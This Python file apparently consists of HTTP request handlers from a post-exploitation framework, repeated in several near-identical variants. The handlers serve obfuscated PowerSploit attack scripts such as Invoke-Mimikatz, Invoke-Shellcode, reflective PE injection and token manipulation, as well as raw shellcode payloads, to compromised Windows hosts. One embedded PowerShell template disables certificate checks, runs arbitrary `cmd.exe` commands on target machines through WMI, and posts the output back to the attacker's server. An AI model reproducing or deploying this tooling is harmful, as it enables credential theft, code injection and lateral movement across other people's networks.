def on_request(self, context, request):
    """Serve the Invoke-Shellcode loader script or the configured shellcode file.

    The request path, with its first character stripped, is compared exactly
    against two names:

    * ``Invoke-Shellcode.ps1`` -- read from ``data/PowerSploit/CodeExecution/``
      under ``base_dir`` (module-level, defined elsewhere), passed through
      ``obfs_ps_script`` with ``self.obfs_name`` and written to the response.
    * the basename of ``self.shellcode_path`` -- the file is written back
      verbatim, after which ``request.stop_tracking_host()`` is called.

    Any other path gets an empty 404.  Only the status line and an empty
    header block are sent; no Content-Type or Content-Length is set.  Because
    the served names are the literal request path, they appear unchanged in
    HTTP request logs.  ``context`` is accepted but not used here.
    """
    requested = request.path[1:]

    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-Shellcode.ps1':
        reply(200)
        script_path = os.path.join(
            base_dir, 'data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1')
        # Text-mode read; obfs_ps_script is defined elsewhere and presumably
        # returns the transformed script text -- TODO confirm.
        with open(script_path, 'r') as fh:
            raw_script = fh.read()
        request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
    elif requested == os.path.basename(self.shellcode_path):
        reply(200)
        with open(self.shellcode_path, 'rb') as fh:
            request.wfile.write(fh.read())
        # The target now has the shellcode, so tracking of this host ends
        # (stop_tracking_host is provided by the request object, elsewhere).
        request.stop_tracking_host()
    else:
        reply(404)
def on_request(self, context, request):
    """Serve Invoke-TokenManipulation.ps1 or the generated TokenRider.ps1 script.

    Matching is an exact comparison of the request path minus its first
    character:

    * ``Invoke-TokenManipulation.ps1`` -- read from a path relative to the
      current working directory (not to this module), passed through
      ``obfs_ps_script`` with ``self.obfs_name`` and written back.
    * ``TokenRider.ps1`` -- a PowerShell script is rendered from a template
      with ``context.server``, ``context.localip``, ``context.server_port``,
      ``self.target_computers`` and ``self.command`` substituted verbatim
      (nothing is quoted or escaped), then written back.  The rendered script
      disables .NET certificate validation for its report-back POST.

    Any other path receives an empty 404.  No Content-Type or Content-Length
    header is emitted on the 200 responses.
    """
    requested = request.path[1:]

    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-TokenManipulation.ps1':
        reply(200)
        with open(
                'data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1',
                'r') as fh:
            raw_script = fh.read()
        # obfs_ps_script is defined elsewhere; presumably returns text.
        request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
    elif requested == 'TokenRider.ps1':
        reply(200)
        # Command line executed on each target by the rendered script.
        command_to_execute = 'cmd.exe /c {}'.format(self.command)
        # NOTE(review): the template appears collapsed onto one line here;
        # the original source was probably multi-line -- confirm before
        # relying on its exact bytes.  Doubled braces survive .format().
        template = ''' [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; function Send-POSTRequest {{ [CmdletBinding()] Param ( [string] $data ) $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($data); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse(); }} $post_output = ""; $targets = @({targets}); foreach ($target in $targets){{ try{{ Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}"; $post_output = $post_output + "Executed command on $target! `n"; }} catch {{ $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n"; }} }} Send-POSTRequest $post_output'''
        fields = {
            # presumably the URL scheme ('http'/'https') -- TODO confirm
            'server': context.server,
            'addr': context.localip,
            'port': context.server_port,
            'targets': self.target_computers,
            'command': command_to_execute,
        }
        request.wfile.write(template.format(**fields))
    else:
        reply(404)
def on_request(self, context, request):
    """Serve Invoke-ReflectivePEInjection.ps1 or the configured payload file.

    The request path minus its first character is compared exactly against:

    * ``Invoke-ReflectivePEInjection.ps1`` -- read from
      ``data/PowerSploit/CodeExecution/`` under ``base_dir`` (module-level,
      defined elsewhere), obfuscated via ``obfs_ps_script`` with
      ``self.obfs_name`` and written back.
    * the basename of ``self.payload_path`` -- ``request.stop_tracking_host()``
      is called first, then the file is written back verbatim.

    Other paths get an empty 404.  No Content-Type/Content-Length is set.
    The served names are the literal request path and therefore appear
    unchanged in HTTP request logs.  ``context`` is unused here.
    """
    requested = request.path[1:]

    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-ReflectivePEInjection.ps1':
        reply(200)
        script_path = os.path.join(
            base_dir,
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1')
        with open(script_path, 'r') as fh:
            raw_script = fh.read()
        # obfs_ps_script is defined elsewhere; presumably returns text.
        request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
    elif requested == os.path.basename(self.payload_path):
        reply(200)
        # Tracking of this host is stopped before the payload is sent
        # (order kept as in the original; stop_tracking_host lives elsewhere).
        request.stop_tracking_host()
        with open(self.payload_path, 'rb') as fh:
            request.wfile.write(fh.read())
    else:
        reply(404)
def on_request(self, context, request):
    """Serve Invoke-TokenManipulation.ps1 or the generated TokenRider.ps1 script.

    Matching is an exact comparison of the request path minus its first
    character:

    * ``Invoke-TokenManipulation.ps1`` -- read from
      ``data/PowerSploit/Exfiltration/`` under ``base_dir`` (module-level,
      defined elsewhere), passed through ``obfs_ps_script`` with
      ``self.obfs_name`` and written back.
    * ``TokenRider.ps1`` -- a PowerShell script is rendered from a template
      with ``context.server``, ``context.localip``, ``context.server_port``,
      ``self.target_computers`` and ``self.command`` substituted verbatim
      (nothing is quoted or escaped), then written back.  The rendered script
      disables .NET certificate validation for its report-back POST.

    Any other path receives an empty 404.  No Content-Type or Content-Length
    header is emitted on the 200 responses.
    """
    requested = request.path[1:]

    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-TokenManipulation.ps1':
        reply(200)
        script_path = os.path.join(
            base_dir,
            'data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1')
        with open(script_path, 'r') as fh:
            raw_script = fh.read()
        # obfs_ps_script is defined elsewhere; presumably returns text.
        request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
    elif requested == 'TokenRider.ps1':
        reply(200)
        # Command line executed on each target by the rendered script.
        command_to_execute = 'cmd.exe /c {}'.format(self.command)
        # NOTE(review): the template appears collapsed onto one line here;
        # the original source was probably multi-line -- confirm before
        # relying on its exact bytes.  Doubled braces survive .format().
        template = ''' [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; function Send-POSTRequest {{ [CmdletBinding()] Param ( [string] $data ) $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($data); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse(); }} $post_output = ""; $targets = @({targets}); foreach ($target in $targets){{ try{{ Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}"; $post_output = $post_output + "Executed command on $target! `n"; }} catch {{ $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n"; }} }} Send-POSTRequest $post_output'''
        fields = {
            # presumably the URL scheme ('http'/'https') -- TODO confirm
            'server': context.server,
            'addr': context.localip,
            'port': context.server_port,
            'targets': self.target_computers,
            'command': command_to_execute,
        }
        request.wfile.write(template.format(**fields))
    else:
        reply(404)
def on_request(self, context, request):
    """Serve the obfuscated Invoke-TokenManipulation.ps1 script.

    Only one path is recognised: a request whose path minus its first
    character equals ``Invoke-TokenManipulation.ps1``.  The script is read
    from a path relative to the current working directory (not to this
    module), passed through ``obfs_ps_script`` with ``self.obfs_name`` and
    written to the response.  Everything else receives an empty 404.  No
    Content-Type or Content-Length header is set.  ``context`` is unused.
    """
    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if request.path[1:] != 'Invoke-TokenManipulation.ps1':
        reply(404)
        return

    reply(200)
    with open(
            'data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1',
            'r') as fh:
        raw_script = fh.read()
    # obfs_ps_script is defined elsewhere; presumably returns text.
    request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
def on_request(self, context, request):
    """Serve the obfuscated PowerView.ps1 script.

    A request whose path minus its first character equals ``PowerView.ps1``
    gets the file ``data/PowerSploit/Recon/PowerView.ps1`` (relative to the
    current working directory) after it has been passed through
    ``obfs_ps_script``.  Any other path receives an empty 404.  No
    Content-Type or Content-Length header is set.  ``context`` is unused.
    """
    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if request.path[1:] != 'PowerView.ps1':
        reply(404)
        return

    reply(200)
    with open('data/PowerSploit/Recon/PowerView.ps1', 'r') as fh:
        raw_script = fh.read()
    # NOTE(review): obfs_ps_script is called here without an obfuscation
    # name (other handlers pass self.obfs_name); presumably the helper has
    # a default -- confirm.
    request.wfile.write(obfs_ps_script(raw_script))
def on_request(self, context, request):
    """Serve the obfuscated Invoke-Mimikatz.ps1 script.

    A request whose path minus its first character equals
    ``Invoke-Mimikatz.ps1`` gets the file from
    ``data/PowerSploit/Exfiltration/`` under ``base_dir`` (module-level,
    defined elsewhere), passed through ``obfs_ps_script`` with
    ``self.obfs_name``.  Any other path receives an empty 404.  No
    Content-Type or Content-Length header is set.  ``context`` is unused.
    """
    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if request.path[1:] != 'Invoke-Mimikatz.ps1':
        reply(404)
        return

    reply(200)
    script_path = os.path.join(
        base_dir, 'data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1')
    with open(script_path, 'r') as fh:
        raw_script = fh.read()
    # obfs_ps_script is defined elsewhere; presumably returns text.
    request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
def on_request(self, context, request):
    """Serve the obfuscated Invoke-Mimikatz.ps1 script.

    A request whose path minus its first character equals
    ``Invoke-Mimikatz.ps1`` gets the file
    ``data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1`` (relative to the
    current working directory, not to this module), passed through
    ``obfs_ps_script`` with ``self.obfs_name``.  Any other path receives an
    empty 404.  No Content-Type or Content-Length header is set.  ``context``
    is unused.
    """
    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if request.path[1:] != "Invoke-Mimikatz.ps1":
        reply(404)
        return

    reply(200)
    with open("data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1", "r") as fh:
        raw_script = fh.read()
    # obfs_ps_script is defined elsewhere; presumably returns text.
    request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
def on_request(self, context, request):
    """Serve the obfuscated Invoke-Shellcode.ps1 script and stop host tracking.

    A request whose path minus its first character equals
    ``Invoke-Shellcode.ps1`` gets the file
    ``data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1`` (relative to the
    current working directory), passed through ``obfs_ps_script`` with
    ``self.obfs_name``; ``request.stop_tracking_host()`` is then called.
    Any other path receives an empty 404.  No Content-Type or Content-Length
    header is set.  ``context`` is unused.
    """
    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if request.path[1:] != 'Invoke-Shellcode.ps1':
        reply(404)
        return

    reply(200)
    with open('data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1', 'r') as fh:
        raw_script = fh.read()
    # obfs_ps_script is defined elsewhere; presumably returns text.
    request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
    # Unlike the two-branch variants, tracking ends once the script itself
    # has been served (stop_tracking_host is provided elsewhere).
    request.stop_tracking_host()
def on_request(self, context, request):
    """Serve the obfuscated Invoke-Mimikatz.ps1 script.

    A request whose path minus its first character equals
    ``Invoke-Mimikatz.ps1`` gets the file from
    ``data/PowerSploit/Exfiltration/`` under ``base_dir`` (module-level,
    defined elsewhere), passed through ``obfs_ps_script`` with
    ``self.obfs_name``.  Any other path receives an empty 404.  No
    Content-Type or Content-Length header is set.  ``context`` is unused.
    """
    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if request.path[1:] != 'Invoke-Mimikatz.ps1':
        reply(404)
        return

    reply(200)
    script_path = os.path.join(
        base_dir, 'data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1')
    with open(script_path, 'r') as fh:
        raw_script = fh.read()
    # obfs_ps_script is defined elsewhere; presumably returns text.
    request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
def on_request(self, context, request):
    """Serve Invoke-ReflectivePEInjection.ps1 or the configured payload file.

    The request path minus its first character is compared exactly against:

    * ``Invoke-ReflectivePEInjection.ps1`` -- read from
      ``data/PowerSploit/CodeExecution/`` relative to the current working
      directory (not to this module), obfuscated via ``obfs_ps_script`` with
      ``self.obfs_name`` and written back.
    * the basename of ``self.payload_path`` -- ``request.stop_tracking_host()``
      is called first, then the file is written back verbatim.

    Other paths get an empty 404.  No Content-Type/Content-Length is set.
    The served names are the literal request path and therefore appear
    unchanged in HTTP request logs.  ``context`` is unused here.
    """
    requested = request.path[1:]

    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-ReflectivePEInjection.ps1':
        reply(200)
        with open(
                'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1',
                'r') as fh:
            raw_script = fh.read()
        # obfs_ps_script is defined elsewhere; presumably returns text.
        request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
    elif requested == os.path.basename(self.payload_path):
        reply(200)
        # Tracking of this host is stopped before the payload is sent
        # (order kept as in the original; stop_tracking_host lives elsewhere).
        request.stop_tracking_host()
        with open(self.payload_path, 'rb') as fh:
            request.wfile.write(fh.read())
    else:
        reply(404)
def on_request(self, context, request):
    """Serve the Invoke-Shellcode loader script or the configured shellcode file.

    The request path, with its first character stripped, is compared exactly
    against two names:

    * ``Invoke-Shellcode.ps1`` -- read from
      ``data/PowerSploit/CodeExecution/`` relative to the current working
      directory (not to this module), passed through ``obfs_ps_script`` with
      ``self.obfs_name`` and written to the response.
    * the basename of ``self.shellcode_path`` -- the file is written back
      verbatim, after which ``request.stop_tracking_host()`` is called.

    Any other path gets an empty 404.  Only the status line and an empty
    header block are sent; no Content-Type or Content-Length is set.  Because
    the served names are the literal request path, they appear unchanged in
    HTTP request logs.  ``context`` is accepted but not used here.
    """
    requested = request.path[1:]

    def reply(status):
        # Status line plus empty header block; the body follows on wfile.
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-Shellcode.ps1':
        reply(200)
        with open('data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1', 'r') as fh:
            raw_script = fh.read()
        # obfs_ps_script is defined elsewhere; presumably returns text.
        request.wfile.write(obfs_ps_script(raw_script, self.obfs_name))
    elif requested == os.path.basename(self.shellcode_path):
        reply(200)
        with open(self.shellcode_path, 'rb') as fh:
            request.wfile.write(fh.read())
        # The target now has the shellcode, so tracking of this host ends
        # (stop_tracking_host is provided by the request object, elsewhere).
        request.stop_tracking_host()
    else:
        reply(404)